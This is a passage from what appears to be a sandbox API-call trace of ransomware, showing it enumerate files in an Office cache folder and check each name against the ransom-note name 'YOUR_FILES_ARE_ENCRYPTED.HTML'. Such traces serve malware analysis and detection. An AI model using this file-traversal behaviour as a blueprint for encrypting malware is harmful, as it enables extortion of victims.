lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.381] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\9639F732-A0F4-4A33-92A0-01330C0BB8C3") returned 157 [0111.381] PathFindExtensionW (pszPath="9639F732-A0F4-4A33-92A0-01330C0BB8C3") returned="" [0111.381] lstrlenW (lpString="") returned 0 [0111.381] PathFindExtensionW (pszPath="9639F732-A0F4-4A33-92A0-01330C0BB8C3") returned="" [0111.381] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc83bbe8a, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xc83bbe8a, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc83bd386, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8b, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="96BAA0E7-CE03-46C0-A45A-8F71ADB9C825", cAlternateFileName="96BAA0~1")) returned 1 [0111.382] StrStrIW (lpFirst="96BAA0E7-CE03-46C0-A45A-8F71ADB9C825", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.382] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\96BAA0E7-CE03-46C0-A45A-8F71ADB9C825") returned 157 [0111.382] PathFindExtensionW (pszPath="96BAA0E7-CE03-46C0-A45A-8F71ADB9C825") returned="" [0111.382] lstrlenW (lpString="") returned 0 [0111.382] PathFindExtensionW (pszPath="96BAA0E7-CE03-46C0-A45A-8F71ADB9C825") returned="" [0111.382] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b07c5d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x82b07c5d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x82b07c5d, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0xd2e, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="9A557D1E-5B55-45D0-B83F-66D1CCFBCC32", cAlternateFileName="9A557D~1")) returned 1 [0111.382] StrStrIW (lpFirst="9A557D1E-5B55-45D0-B83F-66D1CCFBCC32", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.382] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\9A557D1E-5B55-45D0-B83F-66D1CCFBCC32") returned 157 [0111.382] PathFindExtensionW (pszPath="9A557D1E-5B55-45D0-B83F-66D1CCFBCC32") returned="" [0111.382] lstrlenW (lpString="") returned 0 [0111.382] PathFindExtensionW (pszPath="9A557D1E-5B55-45D0-B83F-66D1CCFBCC32") returned="" [0111.382] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb47fb0c7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb47fb0c7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb4811036, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x12b8, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="9AB7658D-3E1C-4997-8753-70D630AC557E", cAlternateFileName="9AB765~1")) returned 1 [0111.382] StrStrIW (lpFirst="9AB7658D-3E1C-4997-8753-70D630AC557E", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.382] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\9AB7658D-3E1C-4997-8753-70D630AC557E") returned 157 [0111.382] PathFindExtensionW (pszPath="9AB7658D-3E1C-4997-8753-70D630AC557E") returned="" [0111.382] lstrlenW (lpString="") returned 0 [0111.382] PathFindExtensionW (pszPath="9AB7658D-3E1C-4997-8753-70D630AC557E") returned="" [0111.382] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8a15964, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xc8a15964, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc8a16c5a, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x451, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="9CFC7195-9421-404F-A40A-EEBD8F033365", cAlternateFileName="9CFC71~1")) returned 1 [0111.382] StrStrIW (lpFirst="9CFC7195-9421-404F-A40A-EEBD8F033365", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.382] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\9CFC7195-9421-404F-A40A-EEBD8F033365") returned 157 [0111.382] PathFindExtensionW (pszPath="9CFC7195-9421-404F-A40A-EEBD8F033365") returned="" [0111.382] lstrlenW (lpString="") returned 0 [0111.382] PathFindExtensionW (pszPath="9CFC7195-9421-404F-A40A-EEBD8F033365") returned="" [0111.382] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabbdccf8, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xabbdccf8, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xabbdccf8, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x135f, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="A0D2B79B-05BB-4871-8DE6-E766643BD65E", cAlternateFileName="A0D2B7~1")) returned 1 [0111.382] StrStrIW (lpFirst="A0D2B79B-05BB-4871-8DE6-E766643BD65E", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.382] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\A0D2B79B-05BB-4871-8DE6-E766643BD65E") returned 157 [0111.382] PathFindExtensionW (pszPath="A0D2B79B-05BB-4871-8DE6-E766643BD65E") returned="" [0111.382] lstrlenW (lpString="") returned 0 [0111.382] PathFindExtensionW (pszPath="A0D2B79B-05BB-4871-8DE6-E766643BD65E") returned="" [0111.382] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabae01a6, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xabae01a6, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xabae01a6, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x108a, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="A1E234BD-B121-49A0-9B4B-BBF6A832161B", cAlternateFileName="A1E234~1")) returned 1 [0111.382] StrStrIW (lpFirst="A1E234BD-B121-49A0-9B4B-BBF6A832161B", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.382] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\A1E234BD-B121-49A0-9B4B-BBF6A832161B") returned 157 [0111.382] PathFindExtensionW (pszPath="A1E234BD-B121-49A0-9B4B-BBF6A832161B") returned="" [0111.382] lstrlenW (lpString="") returned 0 [0111.383] PathFindExtensionW (pszPath="A1E234BD-B121-49A0-9B4B-BBF6A832161B") returned="" [0111.383] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x829ef008, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x829ef008, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x829ef008, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x990a, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="A2F95592-6A7F-475A-878F-C593DA8BBEDD", cAlternateFileName="A2F955~1")) returned 1 [0111.383] StrStrIW (lpFirst="A2F95592-6A7F-475A-878F-C593DA8BBEDD", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.383] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\A2F95592-6A7F-475A-878F-C593DA8BBEDD") returned 157 [0111.383] PathFindExtensionW (pszPath="A2F95592-6A7F-475A-878F-C593DA8BBEDD") returned="" [0111.383] lstrlenW (lpString="") returned 0 [0111.383] PathFindExtensionW (pszPath="A2F95592-6A7F-475A-878F-C593DA8BBEDD") returned="" [0111.383] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82bb0641, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x82bb0641, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x82bb19b0, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x2c34, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="A50A8D38-2A06-4EF5-A84C-B00C714F6B16", cAlternateFileName="A50A8D~1")) returned 1 [0111.383] StrStrIW (lpFirst="A50A8D38-2A06-4EF5-A84C-B00C714F6B16", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.383] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\A50A8D38-2A06-4EF5-A84C-B00C714F6B16") returned 157 [0111.383] PathFindExtensionW (pszPath="A50A8D38-2A06-4EF5-A84C-B00C714F6B16") returned="" [0111.383] lstrlenW (lpString="") returned 0 [0111.383] PathFindExtensionW (pszPath="A50A8D38-2A06-4EF5-A84C-B00C714F6B16") returned="" [0111.383] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc89f5df6, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xc89f5df6, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc89f5df6, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0xc70, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="A5DEC71F-CF32-4AAD-A02A-3B306B7F1FCC", cAlternateFileName="A5DEC7~1")) returned 1 [0111.383] StrStrIW (lpFirst="A5DEC71F-CF32-4AAD-A02A-3B306B7F1FCC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.383] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\A5DEC71F-CF32-4AAD-A02A-3B306B7F1FCC") returned 157 [0111.383] PathFindExtensionW (pszPath="A5DEC71F-CF32-4AAD-A02A-3B306B7F1FCC") returned="" [0111.383] lstrlenW (lpString="") returned 0 [0111.383] PathFindExtensionW (pszPath="A5DEC71F-CF32-4AAD-A02A-3B306B7F1FCC") returned="" [0111.383] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb47bcd99, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb47bcd99, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb47c07a5, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x4af4, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="A766786A-958A-4C62-BC53-FB50D3961070", cAlternateFileName="A76678~1")) returned 1 [0111.383] StrStrIW (lpFirst="A766786A-958A-4C62-BC53-FB50D3961070", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.383] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\A766786A-958A-4C62-BC53-FB50D3961070") returned 157 [0111.383] PathFindExtensionW (pszPath="A766786A-958A-4C62-BC53-FB50D3961070") returned="" [0111.383] lstrlenW (lpString="") returned 0 [0111.383] PathFindExtensionW (pszPath="A766786A-958A-4C62-BC53-FB50D3961070") returned="" [0111.383] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb49c69cc, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb49c69cc, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb49c69cc, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x75b, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="AA8B315F-D191-411A-80E8-BBCCCE176DA7", cAlternateFileName="AA8B31~1")) returned 1 [0111.384] StrStrIW (lpFirst="AA8B315F-D191-411A-80E8-BBCCCE176DA7", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.384] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\AA8B315F-D191-411A-80E8-BBCCCE176DA7") returned 157 [0111.384] PathFindExtensionW (pszPath="AA8B315F-D191-411A-80E8-BBCCCE176DA7") returned="" [0111.384] lstrlenW (lpString="") returned 0 [0111.384] PathFindExtensionW (pszPath="AA8B315F-D191-411A-80E8-BBCCCE176DA7") returned="" [0111.384] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabac2fca, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xabac2fca, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xabac3f0e, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x14c5, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="ABF009F6-7021-47EC-8025-BE55AD5EBB57", cAlternateFileName="ABF009~1")) returned 1 [0111.384] StrStrIW (lpFirst="ABF009F6-7021-47EC-8025-BE55AD5EBB57", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.384] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\ABF009F6-7021-47EC-8025-BE55AD5EBB57") returned 157 [0111.384] PathFindExtensionW (pszPath="ABF009F6-7021-47EC-8025-BE55AD5EBB57") returned="" [0111.384] lstrlenW (lpString="") returned 0 [0111.385] PathFindExtensionW (pszPath="ABF009F6-7021-47EC-8025-BE55AD5EBB57") returned="" [0111.385] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4c8e4b6, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb4c8e4b6, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb4c9806c, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x2171, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="AE6174E6-94A3-4610-AF1E-A5BDD57EB91E", cAlternateFileName="AE6174~1")) returned 1 [0111.385] StrStrIW (lpFirst="AE6174E6-94A3-4610-AF1E-A5BDD57EB91E", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.385] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\AE6174E6-94A3-4610-AF1E-A5BDD57EB91E") returned 157 [0111.385] PathFindExtensionW (pszPath="AE6174E6-94A3-4610-AF1E-A5BDD57EB91E") returned="" [0111.385] lstrlenW (lpString="") returned 0 [0111.385] PathFindExtensionW (pszPath="AE6174E6-94A3-4610-AF1E-A5BDD57EB91E") returned="" [0111.385] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab9c9b2e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xab9c9b2e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xab9c9b2e, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x367e, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="AF769060-9C3B-4F97-8FB8-1EB72198BA39", cAlternateFileName="AF7690~1")) returned 1 [0111.385] StrStrIW (lpFirst="AF769060-9C3B-4F97-8FB8-1EB72198BA39", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.385] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\AF769060-9C3B-4F97-8FB8-1EB72198BA39") returned 157 [0111.385] PathFindExtensionW (pszPath="AF769060-9C3B-4F97-8FB8-1EB72198BA39") returned="" [0111.385] lstrlenW (lpString="") returned 0 [0111.385] PathFindExtensionW (pszPath="AF769060-9C3B-4F97-8FB8-1EB72198BA39") returned="" [0111.385] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab9f96f2, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xab9f96f2, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xab9faa6d, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x2132, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="B1725647-3A36-4C56-9803-89EDCA8238A8", cAlternateFileName="B17256~1")) returned 1 [0111.385] StrStrIW (lpFirst="B1725647-3A36-4C56-9803-89EDCA8238A8", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.385] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\B1725647-3A36-4C56-9803-89EDCA8238A8") returned 157 [0111.385] PathFindExtensionW (pszPath="B1725647-3A36-4C56-9803-89EDCA8238A8") returned="" [0111.385] lstrlenW (lpString="") returned 0 [0111.385] PathFindExtensionW (pszPath="B1725647-3A36-4C56-9803-89EDCA8238A8") returned="" [0111.385] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8c666c7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xc8c666c7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc8c666c7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x148c, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="B20989ED-6B03-4803-ADD0-4360553EC384", cAlternateFileName="B20989~1")) returned 1 [0111.385] StrStrIW (lpFirst="B20989ED-6B03-4803-ADD0-4360553EC384", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.385] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\B20989ED-6B03-4803-ADD0-4360553EC384") returned 157 [0111.385] PathFindExtensionW (pszPath="B20989ED-6B03-4803-ADD0-4360553EC384") returned="" [0111.385] lstrlenW (lpString="") returned 0 [0111.385] PathFindExtensionW (pszPath="B20989ED-6B03-4803-ADD0-4360553EC384") returned="" [0111.385] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb47739f2, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb47739f2, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb47739f2, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x2fff, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="B425CCBC-2F7B-4037-BE71-0F75369139DB", cAlternateFileName="B425CC~1")) returned 1 [0111.385] StrStrIW (lpFirst="B425CCBC-2F7B-4037-BE71-0F75369139DB", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.385] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\B425CCBC-2F7B-4037-BE71-0F75369139DB") returned 157 [0111.385] PathFindExtensionW (pszPath="B425CCBC-2F7B-4037-BE71-0F75369139DB") returned="" [0111.385] lstrlenW (lpString="") returned 0 [0111.385] PathFindExtensionW (pszPath="B425CCBC-2F7B-4037-BE71-0F75369139DB") returned="" [0111.385] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82507873, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x82507873, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x82507873, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x2426, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="B5A94CC7-4FCF-413D-910F-CE4D6FE41DF7", cAlternateFileName="B5A94C~1")) returned 1 [0111.385] StrStrIW (lpFirst="B5A94CC7-4FCF-413D-910F-CE4D6FE41DF7", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.385] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\B5A94CC7-4FCF-413D-910F-CE4D6FE41DF7") returned 157 [0111.385] PathFindExtensionW (pszPath="B5A94CC7-4FCF-413D-910F-CE4D6FE41DF7") returned="" [0111.386] lstrlenW (lpString="") returned 0 [0111.386] PathFindExtensionW (pszPath="B5A94CC7-4FCF-413D-910F-CE4D6FE41DF7") returned="" [0111.386] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4df9f3a, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb4df9f3a, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb4df9f3a, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x7cb, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="B6937276-0D21-44E4-B6A5-2F13F90E1698", cAlternateFileName="B69372~1")) returned 1 [0111.386] StrStrIW (lpFirst="B6937276-0D21-44E4-B6A5-2F13F90E1698", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.386] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\B6937276-0D21-44E4-B6A5-2F13F90E1698") returned 157 [0111.386] PathFindExtensionW (pszPath="B6937276-0D21-44E4-B6A5-2F13F90E1698") returned="" [0111.386] lstrlenW (lpString="") returned 0 [0111.386] PathFindExtensionW (pszPath="B6937276-0D21-44E4-B6A5-2F13F90E1698") returned="" [0111.386] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82cd8b94, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x82cd8b94, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x82cd8b94, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x5505, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="B74632A4-B059-4F5A-849D-252172A06A99", cAlternateFileName="B74632~1")) returned 1 [0111.386] StrStrIW (lpFirst="B74632A4-B059-4F5A-849D-252172A06A99", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.386] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\B74632A4-B059-4F5A-849D-252172A06A99") returned 157 [0111.386] PathFindExtensionW 